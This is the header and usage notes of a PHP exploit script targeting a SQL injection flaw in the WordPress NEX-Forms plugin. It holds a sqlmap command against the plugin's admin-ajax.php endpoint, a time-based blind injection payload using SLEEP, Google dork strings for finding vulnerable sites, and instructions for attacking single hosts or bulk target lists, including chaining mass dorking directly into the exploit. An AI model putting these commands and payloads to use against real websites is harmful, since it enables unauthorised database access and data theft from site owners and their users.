# AUTOR SCRIPT:  Cleiton Pinheiro / Nick: googleINURL
  # Email:         inurlbr@gmail.com
  # Blog:          http://blog.inurl.com.br
  # Twitter:       https://twitter.com/googleinurl
  # Fanpage:       https://fb.com/InurlBrasil
  # Pastebin       http://pastebin.com/u/Googleinurl
  # GIT:           https://github.com/googleinurl
  # PSS:           http://packetstormsecurity.com/user/googleinurl
  # YOUTUBE:       http://youtube.com/c/INURLBrasil
  # PLUS:          http://google.com/+INURLBrasil
  # Who Discovered http://www.homelab.it/index.php/2015/04/21/wordpress-nex-forms-sqli
  # Vulnerability discovered by: Claudio Viviani

{$params['folder']} -u '{$params['target']}/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=1' 
  --technique=B -p nex_forms_Id --dbms mysql {$params['proxy']} --random-agent 
  --answers='follow=N' --dbs --batch --time-sec 10 --level 2  --risk 1

GET VULN:     nex_forms_Id=(id)
$nex_forms_Id=intval($_REQUEST['nex_forms_Id'])
Ex: http://target.us/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=1

Exploit:  AND (SELECT * FROM (SELECT(SLEEP(10)))NdbE)

inurl:nex-forms-express-wp-form-builder
index of nex-forms-express-wp-form-builde

    -t : SET TARGET.
    -f : SET FILE TARGETS.
    -p : SET PROXY
    Execute:
                  php wp3xplo1t.php -t target
                  php wp3xplo1t.php -f targets.txt
                  php wp3xplo1t.php -t target -p 'http://localhost:9090'

./inurlbr.php --dork 'inurl:nex-forms-express-wp-form-builder' -s wp3xplo1t.txt -q 1,6 --comand-vul "php wp3xplo1t.php -t '_TARGET_'"